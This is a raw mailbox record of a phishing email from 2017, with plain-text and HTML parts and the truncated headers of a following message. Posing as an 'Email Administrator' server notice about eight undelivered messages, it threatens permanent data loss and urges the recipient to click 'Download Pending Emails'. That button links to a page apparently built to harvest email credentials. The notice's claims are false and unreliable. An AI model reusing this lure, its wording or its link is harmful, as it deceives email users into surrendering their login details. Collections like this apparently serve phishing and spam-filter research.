From: "Edward Apriandi"<admin@damar.asia>
Date: Thu, 21 Sep 2017 11:07:06 +0300
Message-Id: <E1duwVr-0001ZM-D7@sg1.damar.asia>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 316

You will not see this in a MIME-aware mail reader.
--===============1346816176==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


 =

    	  =

    =

   =

 =

   Server Message
  =


 =

   Dear %0% You have 8 pending emails left on our  server to be delivered t=
o your mail box. These emails have not been properly synced with your mailb=
ox.
 To retrieve your pending emails, click below

   =

   =

    Download Pending Emails
   =

   =

   However, if you do not retrieve your pending emails now, they may be los=
t for ever.
and all your email data will be lost permanently. Regards.
Email Administrator

   =

   =

    =

 =

   =

    This message is auto-generated from E-mail security server, and replies=
 sent to this email can not be delivered. =

This email is meant for: jose@monkey.org
 (C 2017)

   =

	  =



--===============1346816176==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/>
	<title></title>
</head>
<body><P><BR class=3DApple-interchange-newline>
<TABLE id=3Dyui_3_16_0_ym19_1_1494806028948_6398 style=3D'FONT-SIZE: 13px; =
FONT-FAMILY: "Helvetica Neue", "Segoe UI", Helvetica, Arial, "Lucida Grande=
", sans-serif; WIDTH: 781px; WHITE-SPACE: normal; WORD-SPACING: 0px; BORDER=
-COLLAPSE: separate; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(=
0,0,0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-=
LEFT: 0px; MARGIN: 0px; ORPHANS: 2; WIDOWS: 2; DISPLAY: table; LETTER-SPACI=
NG: normal; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IN=
DENT: 0px; -webkit-padding-start: 0px; font-variant-ligatures: normal; font=
-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-styl=
e: initial; text-decoration-color: initial' align=3Dcenter>
<TBODY id=3Dyui_3_16_0_ym19_1_1494806028948_6403 style=3D"WIDTH: 781px; -we=
bkit-padding-start: 0px">
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6402 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD style=3D"BORDER-SPACING: 2px; DISPLAY: table-cell; -webkit-padding-star=
t: 0px" width=3D"10%">&nbsp;</TD>
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6416 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px" width=3D"70%">
<TABLE id=3Dyui_3_16_0_ym19_1_1494806028948_6415 style=3D"BORDER-TOP: rgb(1=
64,164,164) 1px solid; BORDER-RIGHT: rgb(164,164,164) 1px solid; BORDER-COL=
LAPSE: separate; BORDER-BOTTOM: rgb(164,164,164) 1px solid; PADDING-BOTTOM:=
 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: rgb(16=
4,164,164) 1px solid; DISPLAY: table; PADDING-RIGHT: 0px; -webkit-padding-s=
tart: 0px" cellSpacing=3D0>
<TBODY id=3Dyui_3_16_0_ym19_1_1494806028948_6414 style=3D"WIDTH: 539px; -we=
bkit-padding-start: 0px">
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6413 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6412 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px">
<TABLE id=3Dyui_3_16_0_ym19_1_1494806028948_6411 style=3D"WIDTH: 538px; BOR=
DER-COLLAPSE: separate; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT=
: 0px; MARGIN: 0px; DISPLAY: table; PADDING-RIGHT: 0px; -webkit-padding-sta=
rt: 0px" cellSpacing=3D0>
<TBODY id=3Dyui_3_16_0_ym19_1_1494806028948_6410 style=3D"WIDTH: 538px; -we=
bkit-padding-start: 0px">
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6461 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6460 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px" bgColor=3D#045fb4 height=
=3D110><BR style=3D"-webkit-padding-start: 0px">
<TABLE id=3Dyui_3_16_0_ym19_1_1494806028948_6459 style=3D"WIDTH: 429px; BOR=
DER-COLLAPSE: separate; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT=
: 0px; MARGIN: 0px; DISPLAY: table; PADDING-RIGHT: 0px; -webkit-padding-sta=
rt: 0px" align=3Dcenter>
<TBODY id=3Dyui_3_16_0_ym19_1_1494806028948_6458 style=3D"WIDTH: 429px; -we=
bkit-padding-start: 0px">
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6457 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6456 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px"><SPAN style=3D"FONT-SIZE:=
 large; FONT-FAMILY: calibri; COLOR: rgb(255,255,255); -webkit-padding-star=
t: 0px">Server Message</SPAN></TD></TR></TBODY></TABLE></TD></TR>
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6449 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6448 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px" bgColor=3D#f8f8f8><BR sty=
le=3D"-webkit-padding-start: 0px"><BR style=3D"-webkit-padding-start: 0px">
<TABLE id=3Dyui_3_16_0_ym19_1_1494806028948_6447 style=3D"WIDTH: 429px; BOR=
DER-COLLAPSE: separate; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT=
: 0px; MARGIN: 0px; DISPLAY: table; PADDING-RIGHT: 0px; -webkit-padding-sta=
rt: 0px" align=3Dcenter>
<TBODY id=3Dyui_3_16_0_ym19_1_1494806028948_6453 style=3D"WIDTH: 429px; -we=
bkit-padding-start: 0px">
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6452 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6451 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px"><SPAN style=3D"FONT-SIZE:=
 small; FONT-FAMILY: calibri; -webkit-padding-start: 0px"><STRONG style=3D"=
FONT-WEIGHT: 700; -webkit-padding-start: 0px">Dear<SPAN class=3DApple-conve=
rted-space>&nbsp;</SPAN><A style=3D"TEXT-DECORATION: underline; BACKGROUND:=
 none transparent scroll repeat 0% 0%; COLOR: rgb(25,106,212); OUTLINE-WIDT=
H: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADD=
ING-LEFT: 0px; MARGIN: 0px; OUTLINE-COLOR: invert; PADDING-RIGHT: 0px; -web=
kit-padding-start: 0px" href=3D"mailto:aml-medc@scs-net.org" rel=3Dnofollow=
 target=3D_blank ymailto=3D"mailto:aml-medc@scs-net.org">%</A>0%</STRONG></=
SPAN> =

<P id=3Dyui_3_16_0_ym19_1_1494806028948_6454 style=3D"PADDING-BOTTOM: 0px; =
PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; DISPLAY: block; PADDING-R=
IGHT: 0px; -webkit-padding-start: 0px"><SPAN id=3Dyui_3_16_0_ym19_1_1494806=
028948_6455 style=3D"FONT-SIZE: medium; FONT-FAMILY: calibri; -webkit-paddi=
ng-start: 0px">You have 8 pending emails left on our &nbsp;server to be del=
ivered to your mail box. These emails have not been properly synced with yo=
ur mailbox.</SPAN></P>
<P id=3Dyui_3_16_0_ym19_1_1494806028948_6450 style=3D"PADDING-BOTTOM: 0px; =
PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; DISPLAY: block; PADDING-R=
IGHT: 0px; -webkit-padding-start: 0px">To retrieve your pending emails, cli=
ck below</P></TD></TR></TBODY></TABLE></TD></TR>
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6446 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6445 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px" bgColor=3D#f8f8f8 height=
=3D15>&nbsp;</TD></TR>
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6439 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6438 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px" bgColor=3D#f8f8f8>
<TABLE id=3Dyui_3_16_0_ym19_1_1494806028948_6443 style=3D"WIDTH: 429px; BOR=
DER-COLLAPSE: separate; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT=
: 0px; MARGIN: 0px; DISPLAY: table; PADDING-RIGHT: 0px; -webkit-padding-sta=
rt: 0px" align=3Dcenter bgColor=3D#045fb4>
<TBODY id=3Dyui_3_16_0_ym19_1_1494806028948_6442 style=3D"WIDTH: 429px; -we=
bkit-padding-start: 0px">
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6441 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6440 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px">
<DIV id=3Dyui_3_16_0_ym19_1_1494806028948_6444 style=3D"-webkit-padding-sta=
rt: 0px" align=3Dcenter><A style=3D"TEXT-DECORATION: none; BACKGROUND: none=
 transparent scroll repeat 0% 0%; COLOR: rgb(25,106,212); OUTLINE-WIDTH: me=
dium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-L=
EFT: 0px; MARGIN: 0px; OUTLINE-COLOR: invert; PADDING-RIGHT: 0px; -webkit-p=
adding-start: 0px" href=3D"http://ichefportal.com/xyz/xc/u/emailAUTH/index.=
php?email=3Djose@monkey.org" rel=3Dnofollow target=3D_blank><SPAN style=3D"=
FONT-SIZE: small; FONT-FAMILY: calibri; COLOR: rgb(255,255,255); -webkit-pa=
dding-start: 0px">Download Pending Emails</SPAN></A></DIV></TD></TR></TBODY=
></TABLE></TD></TR>
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6437 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6436 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px" bgColor=3D#f8f8f8 height=
=3D20>&nbsp;</TD></TR>
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6429 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6428 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px" bgColor=3D#f8f8f8 height=
=3D70>
<TABLE id=3Dyui_3_16_0_ym19_1_1494806028948_6427 style=3D"WIDTH: 429px; BOR=
DER-COLLAPSE: separate; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT=
: 0px; MARGIN: 0px; DISPLAY: table; PADDING-RIGHT: 0px; -webkit-padding-sta=
rt: 0px" align=3Dcenter>
<TBODY id=3Dyui_3_16_0_ym19_1_1494806028948_6433 style=3D"WIDTH: 429px; -we=
bkit-padding-start: 0px">
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6432 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6431 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px"><SPAN id=3Dyui_3_16_0_ym1=
9_1_1494806028948_6435 style=3D"FONT-SIZE: medium; FONT-FAMILY: calibri; -w=
ebkit-padding-start: 0px"><SPAN id=3Dyui_3_16_0_ym19_1_1494806028948_6434 s=
tyle=3D"FONT-SIZE: medium; FONT-FAMILY: calibri; -webkit-padding-start: 0px=
">However, if you do not retrieve your pending emails now, they may be lost=
 for ever.<BR style=3D"-webkit-padding-start: 0px">and all your email data =
will be lost permanently.</SPAN></SPAN> =

<P id=3Dyui_3_16_0_ym19_1_1494806028948_6430 style=3D"PADDING-BOTTOM: 0px; =
PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; DISPLAY: block; PADDING-R=
IGHT: 0px; -webkit-padding-start: 0px">Regards.<BR style=3D"-webkit-padding=
-start: 0px"><STRONG style=3D"FONT-WEIGHT: 700; -webkit-padding-start: 0px"=
>Email Administrator</STRONG></P></TD></TR></TBODY></TABLE></TD></TR>
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6426 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6425 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px" bgColor=3D#f8f8f8 height=
=3D10>&nbsp;</TD></TR>
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6424 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6423 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px" bgColor=3D#f8f8f8>
<TABLE id=3Dyui_3_16_0_ym19_1_1494806028948_6422 style=3D"WIDTH: 429px; BOR=
DER-COLLAPSE: separate; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT=
: 0px; MARGIN: 0px; DISPLAY: table; PADDING-RIGHT: 0px; -webkit-padding-sta=
rt: 0px" align=3Dcenter>
<TBODY id=3Dyui_3_16_0_ym19_1_1494806028948_6421 style=3D"WIDTH: 429px; -we=
bkit-padding-start: 0px">
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6420 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6419 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px">
<HR style=3D"-webkit-padding-start: 0px" align=3Dcenter width=3D"100%">
</TD></TR></TBODY></TABLE></TD></TR>
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6418 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6417 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px" bgColor=3D#f8f8f8>
<TABLE style=3D"WIDTH: 429px; BORDER-COLLAPSE: separate; PADDING-BOTTOM: 0p=
x; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; DISPLAY: table; PADDIN=
G-RIGHT: 0px; -webkit-padding-start: 0px" align=3Dcenter>
<TBODY style=3D"WIDTH: 429px; -webkit-padding-start: 0px">
<TR style=3D"VERTICAL-ALIGN: inherit; DISPLAY: table-row; -webkit-padding-s=
tart: 0px">
<TD style=3D"BORDER-SPACING: 2px; DISPLAY: table-cell; -webkit-padding-star=
t: 0px">
<P><SPAN style=3D"FONT-SIZE: small; FONT-FAMILY: calibri; -webkit-padding-s=
tart: 0px">This message is auto-generated from E-mail security server, and =
replies sent to this email can not be delivered.<SPAN class=3DApple-convert=
ed-space>&nbsp;</SPAN><BR style=3D"-webkit-padding-start: 0px">This email i=
s meant for: jose@monkey.org</SPAN></P>
<P><SPAN style=3D"FONT-SIZE: small; FONT-FAMILY: calibri; -webkit-padding-s=
tart: 0px"><STRONG style=3D"FONT-WEIGHT: 700; -webkit-padding-start: 0px"><=
SPAN style=3D"COLOR: rgb(4,95,180); -webkit-padding-start: 0px">(C 2017)</S=
PAN></STRONG></SPAN></P></TD></TR></TBODY></TABLE></TD></TR>
<TR id=3Dyui_3_16_0_ym19_1_1494806028948_6409 style=3D"VERTICAL-ALIGN: inhe=
rit; DISPLAY: table-row; -webkit-padding-start: 0px">
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6408 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px" bgColor=3D#f8f8f8 height=
=3D30>&nbsp;</TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD>
<TD id=3Dyui_3_16_0_ym19_1_1494806028948_6401 style=3D"BORDER-SPACING: 2px;=
 DISPLAY: table-cell; -webkit-padding-start: 0px" width=3D"20%">&nbsp;</TD>=
</TR></TBODY></TABLE></P></BODY></HTML>
--===============1346816176==--

From jose@monkey.org Thu Sep 21 19:14:02 2017 +0000
Return-Path: postmaster@ikehikehkimochimiyabi.com
Delivered-To: jose@monkey.org
X-FDA: 73310853924.05.group01_2329eb544295f
X-Spam-Summary: 50,0,0,84591e248d0f9a89,d41d8cd98f00b204,postmaster@ikehikehkimochimiyabi.com,:,RULES_HIT:72:152:255:355:375:379:967:973:978:983:988:989:1185:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1432:1433:1434:1437:1514:1515:1516:1517:1568:1571:1593:1594:1699:1710:1714:1730:1747:1777:1792:2197:2198:2199:2200:2393:2525:2527:2538:2539:2560:2565:2682:2685:2730:2731:2859:2891:2910:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3245:3866:3867:3870:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:5007:6261:6650:6678:6688:7782:8518:8583:8603:9025:9072:9130:9388:9908:10030:10049:10346:11026:11651:11657:11914:12043:12438:12517:12519:12555:12740:12895:12903:12956:12958:12986:13139:21067:21080:21220:21221:21325:21397:21433:21444:21451:21483:21524:21627:30038:30054:30055:30058:30065:30067:30070:30080,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:2:0,LFtime:30,LU
X-HE-Tag: group01_2329eb544295f
X-Filterd-Recvd-Size: 50701
Received: from mail-qt0-f225.google.com (mail-qt0-f225.google.com [209.85.216.225])
	by imf02.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 21 Sep 2017 19:14:01 +0000 (UTC)
Received: by mail-qt0-f225.google.com with SMTP id i50so3308618qtf.0
        for <jose@monkey.org>; Thu, 21 Sep 2017 12:14:01 -0700 (PDT)
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20161025;
        h=x-gm-message-state:message-id:mime-version:from:to:date:subject
         :content-transfer-encoding;
        bh=Ncb4fCTH2fJ4vL8ruOw8nOZkKMdcqz+2eMu5ukAR0Oo=;
        b=Aygpe6Il6qD6qkmOU14yqx1Y6T6TxFb17zwfZslnbPXTzN8M/4hJ0jVKWokwD+PIuM
         jLIcnl/MfWNsil7rPFWz3ny6i8woTrXgW2XD4b0mL4dLbwHOaVexDAtt1AzcJGZBS+70
         GWPX58PUgdU5qciW8m9+yu8NihtqkQg19FB2H+TfNu+BLyjxpRXnuIo2K0WeGEAa/gv9
         oiXIs3I2AdKoDLU0WqooXV8QcGkn73yjSlvNqOjIyf2oe2BvHTkjz/KhVgfIbff0NhpT
         RDIYr9qr5kOIS+EjKj054Bft79KWDuTy3YsSvbVrX9jxCqt6wfMV5lL+tmKH3Rk39Z7W
         KZrQ==
X-Gm-Message-State: AHPjjUjmLdmF9bamtk1xiV3uBuABZ5gPYCc5Q1hT5gzFJFOoEBjG7sXO
	7RnYxolCokXcGebtDpAdaN2xBEA9fs7gff+ku0CMGV97Cc5C+g==
X-Google-Smtp-Source: AOwi7QAxmZvDkCJUfg2J9HtHNZ3TOBOt259uHdrL//qUg3LzPhKV7wMJK/K5gU/btu+rLnrgVVnm39dBkHvF
X-Received: by 10.107.181.196 with SMTP id e187mr4236825iof.178.1506021241132;
        Thu, 21 Sep 2017 12:14:01 -0700 (PDT)
Return-Path: <postmaster@ikehikehkimochimiyabi.com>
Received: from instance-3 (188.180.222.162.bc.googleusercontent.com. [162.222.180.188])
        by smtp-relay.gmail.com with ESMTPS id e141sm689441ite.4.2017.09.21.12.14.01
        for <jose@monkey.org>
        (version=TLS1 cipher=ECDHE-RSA-AES128-SHA bits=128/128);
        Thu, 21 Sep 2017 12:14:01 -0700 (PDT)
X-Relaying-Domain: ikehikehkimochimiyabi.com
Message-Id: <59c40f79.9303240a.f1ba3.c070SMTPIN_ADDED_MISSING@mx.google.com>
MIME-Version: 1.0
